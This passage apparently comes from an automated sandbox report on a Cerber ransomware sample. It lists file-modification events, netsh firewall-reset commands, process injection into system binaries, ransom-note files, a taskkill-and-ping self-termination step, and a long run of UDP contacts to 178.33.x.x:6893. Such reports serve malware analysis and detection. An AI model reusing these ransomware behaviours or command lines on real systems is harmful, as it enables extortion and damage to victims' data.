File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\microsoft sql server C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\documents C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\steam C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\powerpoint C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\the bat! C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\thunderbird C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\excel C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\onenote C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\outlook C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\word C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\office C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
File opened for modification \??\c:\windows\serviceprofiles\localservice\appdata\local\steam C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\NOTEPAD.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2192 wrote to memory of 300 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2192 wrote to memory of 888 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\netsh.exe
PID 2192 wrote to memory of 288 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\mshta.exe
PID 2192 wrote to memory of 2276 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\NOTEPAD.EXE
PID 2192 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe C:\Windows\SysWOW64\cmd.exe
PID 2876 wrote to memory of 2244 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2876 wrote to memory of 1840 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE

Processes

C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe

"C:\Users\Admin\AppData\Local\Temp\Documents\Ransomware.Cerber\cerber.exe"

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall set allprofiles state on

C:\Windows\SysWOW64\netsh.exe

C:\Windows\system32\netsh.exe advfirewall reset

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___WK6IB3_.hta"

C:\Windows\SysWOW64\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\_R_E_A_D___T_H_I_S___VBTJZKN_.txt

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im "cerber.exe"

C:\Windows\SysWOW64\PING.EXE

ping -n 1 127.0.0.1

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x0

Network

Country Destination Domain Proto
FR 178.33.163.131:6893 udp
FR 178.33.163.132:6893 udp
FR 178.33.163.133:6893 udp
FR 178.33.163.134:6893 udp
FR 178.33.163.135:6893 udp
FR 178.33.163.136:6893 udp
FR 178.33.163.137:6893 udp
FR 178.33.163.138:6893 udp
FR 178.33.163.139:6893 udp
FR 178.33.163.140:6893 udp
FR 178.33.163.141:6893 udp
FR 178.33.163.142:6893 udp
FR 178.33.163.143:6893 udp
FR 178.33.163.144:6893 udp
FR 178.33.163.145:6893 udp
FR 178.33.163.146:6893 udp
FR 178.33.163.147:6893 udp
FR 178.33.163.148:6893 udp
FR 178.33.163.149:6893 udp
FR 178.33.163.150:6893 udp
FR 178.33.163.151:6893 udp
FR 178.33.163.152:6893 udp
FR 178.33.163.153:6893 udp
FR 178.33.163.154:6893 udp
FR 178.33.163.155:6893 udp
FR 178.33.163.156:6893 udp
FR 178.33.163.157:6893 udp
FR 178.33.163.158:6893 udp
FR 178.33.163.159:6893 udp
FR 178.33.163.160:6893 udp
FR 178.33.163.161:6893 udp
FR 178.33.163.162:6893 udp
FR 178.33.163.163:6893 udp
FR 178.33.163.164:6893 udp
FR 178.33.163.165:6893 udp
FR 178.33.163.166:6893 udp
FR 178.33.163.167:6893 udp
FR 178.33.163.168:6893 udp
FR 178.33.163.169:6893 udp
FR 178.33.163.170:6893 udp
FR 178.33.163.171:6893 udp
FR 178.33.163.172:6893 udp
FR 178.33.163.173:6893 udp
FR 178.33.163.174:6893 udp
FR 178.33.163.175:6893 udp
FR 178.33.163.176:6893 udp
FR 178.33.163.177:6893 udp
FR 178.33.163.178:6893 udp
FR 178.33.163.179:6893 udp
FR 178.33.163.180:6893 udp
FR 178.33.163.181:6893 udp
FR 178.33.163.182:6893 udp
FR 178.33.163.183:6893 udp
FR 178.33.163.184:6893 udp
FR 178.33.163.185:6893 udp
FR 178.33.163.186:6893 udp
FR 178.33.163.187:6893 udp
FR 178.33.163.188:6893 udp
FR 178.33.163.189:6893 udp
FR 178.33.163.190:6893 udp
FR 178.33.163.191:6893 udp
FR 178.33.163.192:6893 udp
FR 178.33.163.193:6893 udp
FR 178.33.163.194:6893 udp
FR 178.33.163.195:6893 udp
FR 178.33.163.196:6893 udp
FR 178.33.163.197:6893 udp
FR 178.33.163.198:6893 udp
FR 178.33.163.199:6893 udp
FR 178.33.163.200:6893 udp
FR 178.33.163.201:6893 udp
FR 178.33.163.202:6893 udp
FR 178.33.163.203:6893 udp
FR 178.33.163.204:6893 udp
FR 178.33.163.205:6893 udp
FR 178.33.163.206:6893 udp
FR 178.33.163.207:6893 udp
FR 178.33.163.208:6893 udp
FR 178.33.163.209:6893 udp
FR 178.33.163.210:6893 udp
FR 178.33.163.211:6893 udp
FR 178.33.163.212:6893 udp
FR 178.33.163.213:6893 udp
FR 178.33.163.214:6893 udp
FR 178.33.163.215:6893 udp
FR 178.33.163.216:6893 udp
FR 178.33.163.217:6893 udp
FR 178.33.163.218:6893 udp
FR 178.33.163.219:6893 udp
FR 178.33.163.220:6893 udp
FR 178.33.163.221:6893 udp
FR 178.33.163.222:6893 udp
FR 178.33.163.223:6893 udp
FR 178.33.163.224:6893 udp
FR 178.33.163.225:6893 udp
FR 178.33.163.226:6893 udp
FR 178.33.163.227:6893 udp
FR 178.33.163.228:6893 udp
FR 178.33.163.229:6893 udp
FR 178.33.163.230:6893 udp
FR 178.33.163.231:6893 udp
FR 178.33.163.232:6893 udp
FR 178.33.163.233:6893 udp
FR 178.33.163.234:6893 udp
FR 178.33.163.235:6893 udp
FR 178.33.163.236:6893 udp
FR 178.33.163.237:6893 udp
FR 178.33.163.238:6893 udp
FR 178.33.163.239:6893 udp
FR 178.33.163.240:6893 udp
FR 178.33.163.241:6893 udp
FR 178.33.163.242:6893 udp
FR 178.33.163.243:6893 udp
FR 178.33.163.244:6893 udp
FR 178.33.163.245:6893 udp
FR 178.33.163.246:6893 udp
FR 178.33.163.247:6893 udp
FR 178.33.163.248:6893 udp
FR 178.33.163.249:6893 udp
FR 178.33.163.250:6893 udp
FR 178.33.163.251:6893 udp
FR 178.33.163.252:6893 udp
FR 178.33.163.253:6893 udp
FR 178.33.163.254:6893 udp
FR 178.33.163.255:6893 udp
FR 178.33.158.0:6893 udp
FR 178.33.158.1:6893 udp
FR 178.33.158.2:6893 udp
FR 178.33.158.3:6893 udp
FR 178.33.158.4:6893 udp
FR 178.33.158.5:6893 udp
FR 178.33.158.6:6893 udp
FR 178.33.158.7:6893 udp
FR 178.33.158.8:6893 udp
FR 178.33.158.9:6893 udp
FR 178.33.158.10:6893 udp
FR 178.33.158.11:6893 udp
FR 178.33.158.12:6893 udp
FR 178.33.158.13:6893 udp
FR 178.33.158.14:6893 udp
FR 178.33.158.15:6893 udp
FR 178.33.158.16:6893 udp
FR 178.33.158.17:6893 udp
FR 178.33.158.18:6893 udp
FR 178.33.158.19:6893 udp
FR 178.33.158.20:6893 udp
FR 178.33.158.21:6893 udp
FR 178.33.158.22:6893 udp
FR 178.33.158.23:6893 udp
FR 178.33.158.24:6893 udp
FR 178.33.158.25:6893 udp
FR 178.33.158.26:6893 udp
FR 178.33.158.27:6893 udp
FR 178.33.158.28:6893 udp
FR 178.33.158.29:6893 udp
FR 178.33.158.30:6893 udp
FR 178.33.158.31:6893 udp
FR 178.33.159.0:6893 udp
FR 178.33.159.1:6893 udp
FR 178.33.159.2:6893 udp
FR 178.33.159.3:6893 udp
FR 178.33.159.4:6893 udp
FR 178.33.159.5:6893 udp
FR 178.33.159.6:6893 udp
FR 178.33.159.7:6893 udp
FR 178.33.159.8:6893 udp
FR 178.33.159.9:6893 udp
FR 178.33.159.10:6893 udp
FR 178.33.159.11:6893 udp
FR 178.33.159.12:6893 udp
FR 178.33.159.13:6893 udp
FR 178.33.159.14:6893 udp
FR 178.33.159.15:6893 udp
FR 178.33.159.16:6893 udp
FR 178.33.159.17:6893 udp
FR 178.33.159.18:6893 udp
FR 178.33.159.19:6893 udp
FR 178.33.159.20:6893 udp
FR 178.33.159.21:6893 udp
FR 178.33.159.22:6893 udp
FR 178.33.159.23:6893 udp
FR 178.33.159.24:6893 udp
FR 178.33.159.25:6893 udp
FR 178.33.159.26:6893 udp
FR 178.33.159.27:6893 udp
FR 178.33.159.28:6893 udp
FR 178.33.159.29:6893 udp
FR 178.33.159.30:6893 udp
FR 178.33.159.31:6893 udp
FR 178.33.160.0:6893 udp
FR 178.33.160.1:6893 udp
FR 178.33.160.2:6893 udp
FR 178.33.160.3:6893 udp
FR 178.33.160.4:6893 udp
FR 178.33.160.5:6893 udp
FR 178.33.160.6:6893 udp
FR 178.33.160.7:6893 udp
FR 178.33.160.8:6893 udp
FR 178.33.160.9:6893 udp
FR 178.33.160.10:6893 udp
FR 178.33.160.11:6893 udp
FR 178.33.160.12:6893 udp
FR 178.33.160.13:6893 udp
FR 178.33.160.14:6893 udp
FR 178.33.160.15:6893 udp
FR 178.33.160.16:6893 udp
FR 178.33.160.17:6893 udp
FR 178.33.160.18:6893 udp
FR 178.33.160.19:6893 udp
FR 178.33.160.20:6893 udp
FR 178.33.160.21:6893 udp
FR 178.33.160.22:6893 udp
FR 178.33.160.23:6893 udp
FR 178.33.160.24:6893 udp
FR 178.33.160.25:6893 udp
FR 178.33.160.26:6893 udp
FR 178.33.160.27:6893 udp
FR 178.33.160.28:6893 udp
FR 178.33.160.29:6893 udp
FR 178.33.160.30:6893 udp
FR 178.33.160.31:6893 udp
FR 178.33.160.32:6893 udp
FR 178.33.160.33:6893 udp
FR 178.33.160.34:6893 udp
FR 178.33.160.35:6893 udp
FR 178.33.160.36:6893 udp
FR 178.33.160.37:6893 udp
FR 178.33.160.38:6893 udp
FR 178.33.160.39:6893 udp
FR 178.33.160.40:6893 udp
FR 178.33.160.41:6893 udp
FR 178.33.160.42:6893 udp
FR 178.33.160.43:6893 udp
FR 178.33.160.44:6893 udp
FR 178.33.160.45:6893 udp
FR 178.33.160.46:6893 udp
FR 178.33.160.47:6893 udp
FR 178.33.160.48:6893 udp
FR 178.33.160.49:6893 udp
FR 178.33.160.50:6893 udp
FR 178.33.160.51:6893 udp
FR 178.33.160.52:6893 udp
FR 178.33.160.53:6893 udp
FR 178.33.160.54:6893 udp
FR 178.33.160.55:6893 udp
FR 178.33.160.56:6893 udp
FR 178.33.160.57:6893 udp
FR 178.33.160.58:6893 udp
FR 178.33.160.59:6893 udp
FR 178.33.160.60:6893 udp
FR 178.33.160.61:6893 udp
FR 178.33.160.62:6893 udp
FR 178.33.160.63:6893 udp
FR 178.33.160.64:6893 udp
FR 178.33.160.65:6893 udp
FR 178.33.160.66:6893 udp
FR 178.33.160.67:6893 udp
FR 178.33.160.68:6893 udp
FR 178.33.160.69:6893 udp
FR 178.33.160.70:6893 udp
FR 178.33.160.71:6893 udp
FR 178.33.160.72:6893 udp
FR 178.33.160.73:6893 udp
FR 178.33.160.74:6893 udp
FR 178.33.160.75:6893 udp
FR 178.33.160.76:6893 udp
FR 178.33.160.77:6893 udp
FR 178.33.160.78:6893 udp
FR 178.33.160.79:6893 udp
FR 178.33.160.80:6893 udp
FR 178.33.160.81:6893 udp
FR 178.33.160.82:6893 udp
FR 178.33.160.83:6893 udp
FR 178.33.160.84:6893 udp
FR 178.33.160.85:6893 udp
FR 178.33.160.86:6893 udp
FR 178.33.160.87:6893 udp
FR 178.33.160.88:6893 udp
FR 178.33.160.89:6893 udp
FR 178.33.160.90:6893 udp
FR 178.33.160.91:6893 udp
FR 178.33.160.92:6893 udp
FR 178.33.160.93:6893 udp
FR 178.33.160.94:6893 udp
FR 178.33.160.95:6893 udp
FR 178.33.160.96:6893 udp
FR 178.33.160.97:6893 udp
FR 178.33.160.98:6893 udp
FR 178.33.160.99:6893 udp
FR 178.33.160.100:6893 udp
FR 178.33.160.101:6893 udp
FR 178.33.160.102:6893 udp
FR 178.33.160.103:6893 udp
FR 178.33.160.104:6893 udp
FR 178.33.160.105:6893 udp
FR 178.33.160.106:6893 udp
FR 178.33.160.107:6893 udp
FR 178.33.160.108:6893 udp
FR 178.33.160.109:6893 udp
FR 178.33.160.110:6893 udp
FR 178.33.160.111:6893 udp
FR 178.33.160.112:6893 udp
FR 178.33.160.113:6893 udp
FR 178.33.160.114:6893 udp
FR 178.33.160.115:6893 udp
FR 178.33.160.116:6893 udp
FR 178.33.160.117:6893 udp
FR 178.33.160.118:6893 udp
FR 178.33.160.119:6893 udp
FR 178.33.160.120:6893 udp
FR 178.33.160.121:6893 udp
FR 178.33.160.122:6893 udp
FR 178.33.160.123:6893 udp
FR 178.33.160.124:6893 udp
FR 178.33.160.125:6893 udp
FR 178.33.160.126:6893 udp
FR 178.33.160.127:6893 udp
FR 178.33.160.128:6893 udp
FR 178.33.160.129:6893 udp
FR 178.33.160.130:6893 udp
FR 178.33.160.131:6893 udp
FR 178.33.160.132:6893 udp
FR 178.33.160.133:6893 udp
FR 178.33.160.134:6893 udp
FR 178.33.160.135:6893 udp
FR 178.33.160.136:6893 udp
FR 178.33.160.137:6893 udp
FR 178.33.160.138:6893 udp
FR 178.33.160.139:6893 udp
FR 178.33.160.140:6893 udp
FR 178.33.160.141:6893 udp
FR 178.33.160.142:6893 udp
FR 178.33.160.143:6893 udp
FR 178.33.160.144:6893 udp
FR 178.33.160.145:6893 udp
FR 178.33.160.146:6893 udp
FR 178.33.160.147:6893 udp
FR 178.33.160.148:6893 udp
FR 178.33.160.149:6893 udp
FR 178.33.160.150:6893 udp
FR 178.33.160.151:6893 udp
FR 178.33.160.152:6893 udp
FR 178.33.160.153:6893 udp
FR 178.33.160.154:6893 udp
FR 178.33.160.155:6893 udp
FR 178.33.160.156:6893 udp
FR 178.33.160.157:6893 udp
FR 178.33.160.158:6893 udp
FR 178.33.160.159:6893 udp
FR 178.33.160.160:6893 udp
FR 178.33.160.161:6893 udp
FR 178.33.160.162:6893 udp
FR 178.33.160.163:6893 udp
FR 178.33.160.164:6893 udp
FR 178.33.160.165:6893 udp
FR 178.33.160.166:6893 udp
FR 178.33.160.167:6893 udp
FR 178.33.160.168:6893 udp
FR 178.33.160.169:6893 udp
FR 178.33.160.170:6893 udp
FR 178.33.160.171:6893 udp
FR 178.33.160.172:6893 udp
FR 178.33.160.173:6893 udp
FR 178.33.160.174:6893 udp
FR 178.33.160.175:6893 udp
FR 178.33.160.176:6893 udp
FR 178.33.160.177:6893 udp
FR 178.33.160.178:6893 udp
FR 178.33.160.179:6893 udp
FR 178.33.160.180:6893 udp
FR 178.33.160.181:6893 udp
FR 178.33.160.182:6893 udp
FR 178.33.160.183:6893 udp
FR 178.33.160.184:6893 udp
FR 178.33.160.185:6893 udp
FR 178.33.160.186:6893 udp
FR 178.33.160.187:6893 udp
FR 178.33.160.188:6893 udp
FR 178.33.160.189:6893 udp
FR 178.33.160.190:6893 udp
FR 178.33.160.191:6893 udp
FR 178.33.160.192:6893 udp
FR 178.33.160.193:6893 udp
FR 178.33.160.194:6893 udp
FR 178.33.160.195:6893 udp
FR 178.33.160.196:6893 udp
FR 178.33.160.197:6893 udp
FR 178.33.160.198:6893 udp
FR 178.33.160.199:6893 udp
FR 178.33.160.200:6893 udp
FR 178.33.160.201:6893 udp
FR 178.33.160.202:6893 udp
FR 178.33.160.203:6893 udp
FR 178.33.160.204:6893 udp
FR 178.33.160.205:6893 udp
FR 178.33.160.206:6893 udp
FR 178.33.160.207:6893 udp
FR 178.33.160.208:6893 udp
FR 178.33.160.209:6893 udp
FR 178.33.160.210:6893 udp
FR 178.33.160.211:6893 udp
FR 178.33.160.212:6893 udp
FR 178.33.160.213:6893 udp
FR 178.33.160.214:6893 udp
FR 178.33.160.215:6893 udp
FR 178.33.160.216:6893 udp
FR 178.33.160.217:6893 udp
FR 178.33.160.218:6893 udp
FR 178.33.160.219:6893 udp
FR 178.33.160.220:6893 udp
FR 178.33.160.221:6893 udp
FR 178.33.160.222:6893 udp
FR 178.33.160.223:6893 udp
FR 178.33.160.224:6893 udp
FR 178.33.160.225:6893 udp
FR 178.33.160.226:6893 udp
FR 178.33.160.227:6893 udp
FR 178.33.160.228:6893 udp
FR 178.33.160.229:6893 udp
FR 178.33.160.230:6893 udp
FR 178.33.160.231:6893 udp
FR 178.33.160.232:6893 udp
FR 178.33.160.233:6893 udp
FR 178.33.160.234:6893 udp
FR 178.33.160.235:6893 udp
FR 178.33.160.236:6893 udp
FR 178.33.160.237:6893 udp
FR 178.33.160.238:6893 udp
FR 178.33.160.239:6893 udp
FR 178.33.160.240:6893 udp
FR 178.33.160.241:6893 udp
FR 178.33.160.242:6893 udp
FR 178.33.160.243:6893 udp
FR 178.33.160.244:6893 udp
FR 178.33.160.245:6893 udp
FR 178.33.160.246:6893 udp
FR 178.33.160.247:6893 udp
FR 178.33.160.248:6893 udp
FR 178.33.160.249:6893 udp
FR 178.33.160.250:6893 udp
FR 178.33.160.251:6893 udp
FR 178.33.160.252:6893 udp
FR 178.33.160.253:6893 udp
FR 178.33.160.254:6893 udp
FR 178.33.160.255:6893 udp
FR 178.33.161.0:6893 udp
FR 178.33.161.1:6893 udp
FR 178.33.161.2:6893 udp
FR 178.33.161.3:6893 udp
FR 178.33.161.4:6893 udp
FR 178.33.161.5:6893 udp
FR 178.33.161.6:6893 udp
FR 178.33.161.7:6893 udp
FR 178.33.161.8:6893 udp
FR 178.33.161.9:6893 udp
FR 178.33.161.10:6893 udp
FR 178.33.161.11:6893 udp
FR 178.33.161.12:6893 udp
FR 178.33.161.13:6893 udp
FR 178.33.161.14:6893 udp
FR 178.33.161.15:6893 udp
FR 178.33.161.16:6893 udp
FR 178.33.161.17:6893 udp
FR 178.33.161.18:6893 udp
FR 178.33.161.19:6893 udp
FR 178.33.161.20:6893 udp
FR 178.33.161.21:6893 udp
FR 178.33.161.22:6893 udp
FR 178.33.161.23:6893 udp
FR 178.33.161.24:6893 udp
FR 178.33.161.25:6893 udp
FR 178.33.161.26:6893 udp
FR 178.33.161.27:6893 udp
FR 178.33.161.28:6893 udp
FR 178.33.161.29:6893 udp
FR 178.33.161.30:6893 udp
FR 178.33.161.31:6893 udp
FR 178.33.161.32:6893 udp
FR 178.33.161.33:6893 udp
FR 178.33.161.34:6893 udp
FR 178.33.161.35:6893 udp
FR 178.33.161.36:6893 udp
FR 178.33.161.37:6893 udp
FR 178.33.161.38:6893 udp
FR 178.33.161.39:6893 udp
FR 178.33.161.40:6893 udp
FR 178.33.161.41:6893 udp
FR 178.33.161.42:6893 udp
FR 178.33.161.43:6893 udp
FR 178.33.161.44:6893 udp
FR 178.33.161.45:6893 udp
FR 178.33.161.46:6893 udp
FR 178.33.161.47:6893 udp
FR 178.33.161.48:6893 udp
FR 178.33.161.49:6893 udp
FR 178.33.161.50:6893 udp
FR 178.33.161.51:6893 udp
FR 178.33.161.52:6893 udp
FR 178.33.161.53:6893 udp
FR 178.33.161.54:6893 udp
FR 178.33.161.55:6893 udp
FR 178.33.161.56:6893 udp
FR 178.33.161.57:6893 udp
FR 178.33.161.58:6893 udp
FR 178.33.161.59:6893 udp
FR 178.33.161.60:6893 udp
FR 178.33.161.61:6893 udp
FR 178.33.161.62:6893 udp
FR 178.33.161.63:6893 udp
FR 178.33.161.64:6893 udp
FR 178.33.161.65:6893 udp
FR 178.33.161.66:6893 udp
FR 178.33.161.67:6893 udp
FR 178.33.161.68:6893 udp
FR 178.33.161.69:6893 udp
FR 178.33.161.70:6893 udp
FR 178.33.161.71:6893 udp
FR 178.33.161.72:6893 udp
FR 178.33.161.73:6893 udp
FR 178.33.161.74:6893 udp
FR 178.33.161.75:6893 udp
FR 178.33.161.76:6893 udp
FR 178.33.161.77:6893 udp
FR 178.33.161.78:6893 udp
FR 178.33.161.79:6893 udp
FR 178.33.161.80:6893 udp
FR 178.33.161.81:6893 udp
FR 178.33.161.82:6893 udp
FR 178.33.161.83:6893 udp
FR 178.33.161.84:6893 udp
FR 178.33.161.85:6893 udp
FR 178.33.161.86:6893 udp
FR 178.33.161.87:6893 udp
FR 178.33.161.88:6893 udp
FR 178.33.161.89:6893 udp
FR 178.33.161.90:6893 udp
FR 178.33.161.91:6893 udp
FR 178.33.161.92:6893 udp
FR 178.33.161.93:6893 udp
FR 178.33.161.94:6893 udp
FR 178.33.161.95:6893 udp
FR 178.33.161.96:6893 udp
FR 178.33.161.97:6893 udp
FR 178.33.161.98:6893 udp
FR 178.33.161.99:6893 udp
FR 178.33.161.100:6893 udp
FR 178.33.161.101:6893 udp
FR 178.33.161.102:6893 udp
FR 178.33.161.103:6893 udp
FR 178.33.161.104:6893 udp
FR 178.33.161.105:6893 udp
FR 178.33.161.106:6893 udp
FR 178.33.161.107:6893 udp
FR 178.33.161.108:6893 udp
FR 178.33.161.109:6893 udp
FR 178.33.161.110:6893 udp
FR 178.33.161.111:6893 udp
FR 178.33.161.112:6893 udp
FR 178.33.161.113:6893 udp
FR 178.33.161.114:6893 udp
FR 178.33.161.115:6893 udp
FR 178.33.161.116:6893 udp
FR 178.33.161.117:6893 udp
FR 178.33.161.118:6893 udp
FR 178.33.161.119:6893 udp
FR 178.33.161.120:6893 udp
FR 178.33.161.121:6893 udp
FR 178.33.161.122:6893 udp
FR 178.33.161.123:6893 udp
FR 178.33.161.124:6893 udp
FR 178.33.161.125:6893 udp
FR 178.33.161.126:6893 udp
FR 178.33.161.127:6893 udp
FR 178.33.161.128:6893 udp
FR 178.33.161.129:6893 udp
FR 178.33.161.130:6893 udp
FR 178.33.161.131:6893 udp
FR 178.33.161.132:6893 udp
FR 178.33.161.133:6893 udp
FR 178.33.161.134:6893 udp
FR 178.33.161.135:6893 udp
FR 178.33.161.136:6893 udp
FR 178.33.161.137:6893 udp
FR 178.33.161.138:6893 udp
FR 178.33.161.139:6893 udp
FR 178.33.161.140:6893 udp
FR 178.33.161.141:6893 udp
FR 178.33.161.142:6893 udp
FR 178.33.161.143:6893 udp
FR 178.33.161.144:6893 udp
FR 178.33.161.145:6893 udp
FR 178.33.161.146:6893 udp
FR 178.33.161.147:6893 udp
FR 178.33.161.148:6893 udp
FR 178.33.161.149:6893 udp
FR 178.33.161.150:6893 udp
FR 178.33.161.151:6893 udp
FR 178.33.161.152:6893 udp
FR 178.33.161.153:6893 udp
FR 178.33.161.154:6893 udp
FR 178.33.161.155:6893 udp
FR 178.33.161.156:6893 udp
FR 178.33.161.157:6893 udp
FR 178.33.161.158:6893 udp
FR 178.33.161.159:6893 udp
FR 178.33.161.160:6893 udp
FR 178.33.161.161:6893 udp
FR 178.33.161.162:6893 udp
FR 178.33.161.163:6893 udp
FR 178.33.161.164:6893 udp
FR 178.33.161.165:6893 udp
FR 178.33.161.166:6893 udp
FR 178.33.161.167:6893 udp
FR 178.33.161.168:6893 udp
